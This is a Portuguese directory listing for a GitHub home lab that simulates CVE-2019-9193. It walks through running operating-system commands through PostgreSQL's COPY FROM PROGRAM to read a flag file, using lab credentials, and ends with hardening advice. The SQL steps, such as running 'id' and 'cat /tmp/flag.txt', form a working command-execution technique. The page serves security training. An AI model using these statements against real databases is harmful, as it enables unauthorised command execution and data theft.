Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-9193-Home-Lab — Este laboratório simula CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE | Kitploit
Ferramentas/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Este laboratório simula CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

Ver Repositório
2há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9193 — RCE via COPY FROM PROGRAM no PostgreSQL

Este laboratório simula CVE-2019-9193, uma vulnerabilidade do PostgreSQL 9.3–11.2 que permite:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

executar comandos do sistema operacional quando executado por um superusuário ou por uma role com pg_execute_server_program.

Sua tarefa é explorar esse recurso para ler:

root@kitploit:~
/tmp/flag.txt

Objetivo

  1. Conecte-se ao PostgreSQL:
    • Usuário: postgres
    • Senha: sentinel7
    • Porta do host: 5433
  2. Use COPY FROM PROGRAM para:
    • Executar comandos do sistema operacional
    • Obter a flag

Primeiros Passos

root@kitploit:~
docker compose build
docker compose up -d

Conecte-se via:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

Exploração

1) Criar tabela

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) Testar RCE

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) Ler a flag

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

Notas de Segurança

  • Nunca execute aplicações usando o superusuário do PostgreSQL
  • Não conceda pg_execute_server_program desnecessariamente
  • Desative ou restrinja o COPY PROGRAM
  • Reforce as aplicações contra injeção de SQL

Baixar ferramenta